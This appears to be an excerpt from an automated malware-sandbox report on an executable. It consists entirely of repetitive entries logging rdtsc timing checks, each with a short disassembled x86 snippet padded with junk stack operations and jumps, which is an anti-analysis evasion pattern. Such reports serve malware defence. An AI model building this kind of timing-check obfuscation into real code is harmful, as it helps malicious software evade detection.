                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 73D779 second address: 73D77D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 73D77D second address: 73D783 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 73D783 second address: 73D789 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 73D789 second address: 73D7A2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 jbe 00007FED74F3E516h 0x0000000b pop esi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jo 00007FED74F3E516h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 73D7A2 second address: 73D7B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FED75508866h 0x0000000a jbe 00007FED75508866h 0x00000010 popad 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 73D7B3 second address: 73D7B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 73D906 second address: 73D929 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508875h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007FED7550886Eh 0x0000000f push edi 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 73D929 second address: 73D947 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 push ecx 0x00000007 jmp 00007FED74F3E525h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 73DAB4 second address: 73DAC3 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FED75508866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 73DC4B second address: 73DC75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007FED74F3E516h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pushad 0x0000000e jmp 00007FED74F3E528h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 73DC75 second address: 73DC79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 73DC79 second address: 73DC7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 73DC7D second address: 73DC83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 73DDE9 second address: 73DE01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E524h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 73E328 second address: 73E32D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 741DD2 second address: 741DE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FED74F3E51Ch 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 741DE2 second address: 741DF8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508870h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 741DF8 second address: 741E09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007FED74F3E51Bh 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 744A87 second address: 744A8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 744BFE second address: 744C08 instructions: 0x00000000 rdtsc 0x00000002 js 00007FED74F3E516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 744C08 second address: 744C0F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 744C0F second address: 744C29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 jmp 00007FED74F3E521h 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 744EFE second address: 744F13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FED75508866h 0x0000000a jmp 00007FED7550886Bh 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 749ED4 second address: 749F0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 ja 00007FED74F3E516h 0x0000000d pop ecx 0x0000000e popad 0x0000000f pushad 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 pop edx 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 ja 00007FED74F3E516h 0x0000001d jc 00007FED74F3E516h 0x00000023 popad 0x00000024 jmp 00007FED74F3E522h 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6B163B second address: 6B1662 instructions: 0x00000000 rdtsc 0x00000002 js 00007FED7550887Dh 0x00000008 jo 00007FED75508866h 0x0000000e jmp 00007FED75508871h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6B1662 second address: 6B167E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E528h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6B167E second address: 6B1684 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6B1684 second address: 6B16B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 jng 00007FED74F3E516h 0x0000000d jmp 00007FED74F3E51Dh 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FED74F3E526h 0x0000001a rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6B16B7 second address: 6B16BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 74918F second address: 7491A4 instructions: 0x00000000 rdtsc 0x00000002 je 00007FED74F3E516h 0x00000008 jmp 00007FED74F3E51Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 7491A4 second address: 7491C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FED75508870h 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 749491 second address: 749499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 749499 second address: 74949E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 74978D second address: 7497A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f jnp 00007FED74F3E51Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 74DFD9 second address: 74DFE5 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FED75508866h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 74D88E second address: 74D8BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FED74F3E51Fh 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FED74F3E51Eh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 74D8BC second address: 74D8C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 74DD1E second address: 74DD22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 74DD22 second address: 74DD31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 74DD31 second address: 74DD3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 74DD3B second address: 74DD41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 7527AA second address: 7527AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 7527AE second address: 7527DD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jnc 00007FED75508866h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pop eax 0x00000012 push edi 0x00000013 push edi 0x00000014 pop edi 0x00000015 jc 00007FED75508866h 0x0000001b pop edi 0x0000001c pushad 0x0000001d jmp 00007FED7550886Ah 0x00000022 je 00007FED75508866h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 75298D second address: 752994 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 752994 second address: 75299C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 75299C second address: 7529A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 752C69 second address: 752C76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 752C76 second address: 752C80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 752C80 second address: 752C8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007FED75508866h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 752C8F second address: 752C93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 752DCB second address: 752DD1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 752DD1 second address: 752DD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 752DD7 second address: 752DDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 752DDD second address: 752DE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 752DE1 second address: 752E02 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jc 00007FED75508866h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e ja 00007FED75508878h 0x00000014 push esi 0x00000015 jmp 00007FED7550886Ah 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6FA470 second address: 6FA475 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6FA475 second address: 6FA502 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 mov edx, dword ptr [ebp+122D3900h] 0x0000000e mov ebx, dword ptr [ebp+12481454h] 0x00000014 or edx, 4FA532EDh 0x0000001a add eax, ebx 0x0000001c add dword ptr [ebp+122D184Fh], esi 0x00000022 jc 00007FED7550886Ch 0x00000028 push eax 0x00000029 jmp 00007FED7550886Eh 0x0000002e mov dword ptr [esp], eax 0x00000031 mov dword ptr [ebp+122D1820h], edi 0x00000037 push 00000004h 0x00000039 push 00000000h 0x0000003b push ebp 0x0000003c call 00007FED75508868h 0x00000041 pop ebp 0x00000042 mov dword ptr [esp+04h], ebp 0x00000046 add dword ptr [esp+04h], 0000001Bh 0x0000004e inc ebp 0x0000004f push ebp 0x00000050 ret 0x00000051 pop ebp 0x00000052 ret 0x00000053 sub dword ptr [ebp+122D184Fh], eax 0x00000059 call 00007FED7550886Fh 0x0000005e mov edi, dword ptr [ebp+122D3928h] 0x00000064 pop edi 0x00000065 push eax 0x00000066 pushad 0x00000067 push eax 0x00000068 push edx 0x00000069 push edx 0x0000006a pop edx 0x0000006b rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6FA502 second address: 6FA510 instructions: 0x00000000 rdtsc 0x00000002 js 00007FED74F3E516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 752F93 second address: 752F9D instructions: 0x00000000 rdtsc 0x00000002 jg 00007FED75508866h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 752F9D second address: 752FA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 752FA3 second address: 752FA8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 752FA8 second address: 752FB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 753B55 second address: 753B67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FED7550886Eh 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 753B67 second address: 753B75 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FED74F3E516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 7595BB second address: 7595C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 75987C second address: 759897 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FED74F3E525h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jmp 00007FED74F3E51Dh 0x00000013 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 759EA2 second address: 759EC9 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FED7550886Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FED75508875h 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 75A74A second address: 75A76D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FED74F3E516h 0x0000000a jmp 00007FED74F3E529h 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 75AA35 second address: 75AA3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 75AA3D second address: 75AA4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007FED74F3E516h 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 75AA4D second address: 75AA51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 75AA51 second address: 75AA74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FED74F3E529h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 75AF84 second address: 75AF88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 75AF88 second address: 75AF8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 75AF8C second address: 75AFA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FED75508866h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jns 00007FED75508866h 0x00000013 push edx 0x00000014 pop edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 761012 second address: 761016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 761016 second address: 76101B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 764F61 second address: 764F65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 764F65 second address: 764F6C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 7645CC second address: 7645E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E520h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 7645E3 second address: 7645ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 7645ED second address: 7645FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FED74F3E516h 0x0000000a popad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 7645FB second address: 764601 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 76C14F second address: 76C1B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FED74F3E516h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007FED74F3E528h 0x00000011 pushad 0x00000012 popad 0x00000013 jc 00007FED74F3E516h 0x00000019 popad 0x0000001a jmp 00007FED74F3E523h 0x0000001f popad 0x00000020 pushad 0x00000021 jns 00007FED74F3E51Ah 0x00000027 push ebx 0x00000028 pushad 0x00000029 popad 0x0000002a pop ebx 0x0000002b push edx 0x0000002c jmp 00007FED74F3E51Fh 0x00000031 pop edx 0x00000032 push ebx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 76C705 second address: 76C725 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED7550886Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007FED75508866h 0x00000011 jne 00007FED75508866h 0x00000017 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 76C725 second address: 76C73A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FED74F3E51Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 76CB89 second address: 76CB8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 76CB8F second address: 76CBB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FED74F3E516h 0x00000009 jl 00007FED74F3E516h 0x0000000f jmp 00007FED74F3E51Fh 0x00000014 push edi 0x00000015 pop edi 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push ebx 0x0000001c push esi 0x0000001d pop esi 0x0000001e pop ebx 0x0000001f rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 76D2C9 second address: 76D2CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
